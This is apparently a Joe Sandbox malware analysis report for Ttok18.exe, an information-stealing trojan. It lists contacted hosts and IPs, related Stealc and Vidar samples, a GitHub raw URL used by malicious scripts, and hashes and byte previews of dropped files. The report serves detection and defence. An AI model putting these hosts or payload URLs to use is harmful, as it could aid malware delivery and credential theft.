                                                                                                                                                  185.199.111.133
                                                                                                                                                  raw.githubusercontent.comNetherlands
                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                  149.154.167.99
                                                                                                                                                  t.meUnited Kingdom
                                                                                                                                                  62041TELEGRAMRUfalse
                                                                                                                                                  239.255.255.250
                                                                                                                                                  unknownReserved
                                                                                                                                                  unknownunknownfalse
                                                                                                                                                  159.69.102.165
                                                                                                                                                  kresk.lolGermany
                                                                                                                                                  24940HETZNER-ASDEfalse
                                                                                                                                                  142.250.181.68
                                                                                                                                                  www.google.comUnited States
                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                  IP
                                                                                                                                                  127.0.0.1
                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1568488
                                                                                                                                                  Start date and time:2024-12-04 17:03:00 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 7m 37s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:23
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:Ttok18.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@41/51@6/7
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 37.5%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 352
                                                                                                                                                  • Number of non-executed functions: 44
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.78, 64.233.164.84, 172.217.17.46, 172.217.17.67, 23.218.208.109
                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, e16604.g.akamaiedge.net, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2472 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5352 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7300 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7408 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                  • VT rate limit hit for: Ttok18.exe
                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  11:03:58API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                                                                                  11:04:17API Interceptor50x Sleep call for process: Ttok18.exe modified
                                                                                                                                                  11:04:41API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  20.233.83.145https://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                        TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                          TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                            TT18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                              Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                rookie_2.30.0_portable.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                  secondaryTask.vbsGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                                                                                    LauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                                                                                      185.199.111.133cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                      BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                      149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/img/favicon.ico
                                                                                                                                                                      http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                      http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/?setln=pl
                                                                                                                                                                      http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.dog/
                                                                                                                                                                      LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                      • t.me/cinoshibot
                                                                                                                                                                      jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                      • t.me/cinoshibot
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      raw.githubusercontent.comfile.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                      ft.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                      main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                      Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                      gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                      TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                      TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      t.mejtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      o26qobnkQI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      mtbkkesfthae.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      https://cocain.vip/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      github.comhttps://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      PO24002292.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      TT18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      rookie_2.30.0_portable.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      secondaryTask.vbsGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      kresk.loljtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      o26qobnkQI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      TELEGRAMRUjtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      rOJS25YL2e.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Uii3leknna.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Uii3leknna.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      DxWl6xEBp7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      DxWl6xEBp7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Teklif Talebi #U0130hale No_14991_PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      FASTLYUSfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 151.101.1.91
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 151.101.65.91
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 151.101.193.91
                                                                                                                                                                      https://trinasolarus-my.sharepoint.com/:f:/g/personal/matt_hutchison_trinasolar_com/EuTm6V8CKxFPmV0-8tDYkU8B7bgg8BNpE1Urptg3NNJsZw?e=bQub2MGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 151.101.2.137
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 151.101.1.91
                                                                                                                                                                      https://bdb142c8309e44b2310105b0e00240d6.surge.sh/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 151.101.194.137
                                                                                                                                                                      https://indiollanero7nudos.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 151.101.129.181
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 151.101.65.91
                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                      • 151.101.1.91
                                                                                                                                                                      HETZNER-ASDEjtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                      • 49.12.121.47
                                                                                                                                                                      o26qobnkQI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      https://ammyy.com/en/downloads.htmlGet hashmaliciousFlawedammyyBrowse
                                                                                                                                                                      • 136.243.18.118
                                                                                                                                                                      Advertising Agreement for Youtube Cooperation.scrGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      • 148.251.0.164
                                                                                                                                                                      xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 144.79.65.48
                                                                                                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                      17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                      • 52.228.161.161
                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                      https://trinasolarus-my.sharepoint.com/:f:/g/personal/matt_hutchison_trinasolar_com/EuTm6V8CKxFPmV0-8tDYkU8B7bgg8BNpE1Urptg3NNJsZw?e=bQub2MGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 20.42.73.31
                                                                                                                                                                      Welcome To Raise.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 52.109.76.243
                                                                                                                                                                      https://bdb142c8309e44b2310105b0e00240d6.surge.sh/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 150.171.28.10
                                                                                                                                                                      https://indiollanero7nudos.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 20.70.246.20
                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                      sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 13.107.9.158
                                                                                                                                                                      oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 13.107.9.158
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ehttp://fdgfhvcfdgfhhjh.gharelokhana.com/common/loginGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      rOJS25YL2e.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      Uii3leknna.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      Uii3leknna.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      DxWl6xEBp7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      Z8HJ4RohXr.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      DxWl6xEBp7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      Teklif Talebi #U0130hale No_14991_PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      1733325245efb540ba670bc87cda05695e7839c909eeca3e1633b495d258461820ead14a47442.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      FwhEhTLFjX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      7oE3oHSo29.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      zLL6hlzpzh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      RcF6bkWVZQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      3FHcnOdHz2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      N6qmjsVv1D.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      fcEkpnbfeG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 159.69.102.165
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      No context
                                                                                                                                                                      Process:C:\Users\user\Desktop\Ttok18.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):476160
                                                                                                                                                                      Entropy (8bit):7.302597587896513
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:fVpxoBb+6pIE70i+cif0o5HDl5nUnOpvJ3wpUfcx+43+jyQ/D5PvugK/alI1DB4E:6Ii+cni3h3wpUy+5jyqFvlMfQWt
                                                                                                                                                                      MD5:F453C5F8C736FF8C381E7022CAD85E3E
                                                                                                                                                                      SHA1:1906C904A33B1910B88F2020A7942776AB7AD54E
                                                                                                                                                                      SHA-256:36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
                                                                                                                                                                      SHA-512:B9A64DAA7591029D966D8AC6684C1EB049F6A3F89865FB760E0EBFE57DC300D3F6F50DACE3353E461370655A8D8BF518AC7B176C574F73ECD43713AD9851282F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Mg..........................................@...........................(.............................................H.................................(........................................\...........P................................text............................... ....rdata..............................@..@.data...D!".........................@....00cfg........'.....................@..@.reloc.......(.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                      Entropy (8bit):1.307360196865577
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr4:KooCEYhgYEL0In
                                                                                                                                                                      MD5:8AABD071749C511AC5351F2892B64EF6
                                                                                                                                                                      SHA1:1ECEC62EFF27C2E6CD0731B4038E13E82982BBF1
                                                                                                                                                                      SHA-256:F5DAB9BB7D3103818961C97B23F603707BE714077BE84F6172838AB2FB72538F
                                                                                                                                                                      SHA-512:4C07F78B150FF8668E7CD166456CF434E2F0732FA6A66C847E072B185A46C9BB3E7D32C00DFA1BE0DAC0C8946062D68D10E2C82F56A770A218ED6E35C0611114
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd21536d5, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                      Entropy (8bit):0.4221598173107011
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                                                                                                                                                                      MD5:ED297DB9F4D0137243D4B8BF507248D0
                                                                                                                                                                      SHA1:E91957F2F7C29E416E407E677DA9CD3C6E7FEE06
                                                                                                                                                                      SHA-256:4ED6F4C3E9D2BA16E444F7AF5FB858BE254CBEDDBCA52DD8CE89B7BACD0132BA
                                                                                                                                                                      SHA-512:FA6EF4E4CAFBB0D71321F5AA46DBB102F2C089F5963C71BC3AFC2F45825F00B1A697B130B6865177871F37A5821BEB256BF12305BC74EF866FA621CEB73B16D1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..6.... .......A.......X\...;...{......................0.!..........{A.)....|9.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................<...)....|9.................."..)....|9..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                      Entropy (8bit):0.07649569181953877
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:pEUYe7dp/lgejjn13a/IzklYllcVO/lnlZMxZNQl:WUz7bdj53qIzsIOewk
                                                                                                                                                                      MD5:FE0FA007CD8FBE14A3C0FE7E819B9002
                                                                                                                                                                      SHA1:684F8FA67668E95D9DB631B07DF4F1A5F6ED101A
                                                                                                                                                                      SHA-256:F9B8B92B5AFB4582A2C31A3AED6BC979A41923EA603160D74B9444388866A30D
                                                                                                                                                                      SHA-512:A7CC669AB8C3725AB8ED5190E106186A0AAB63BECECF5003CF0E0691C2F252B15A5CC93697DE23F00314DAD1AC22D94F05F4D5DF9730FEE0EEFC6F807EC3C7CB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.a]......................................;...{..)....|9......{A..............{A......{A..........{A]................."..)....|9.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                      Entropy (8bit):4.694985340190863
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                      MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                      SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                      SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                      SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                      Malicious:false
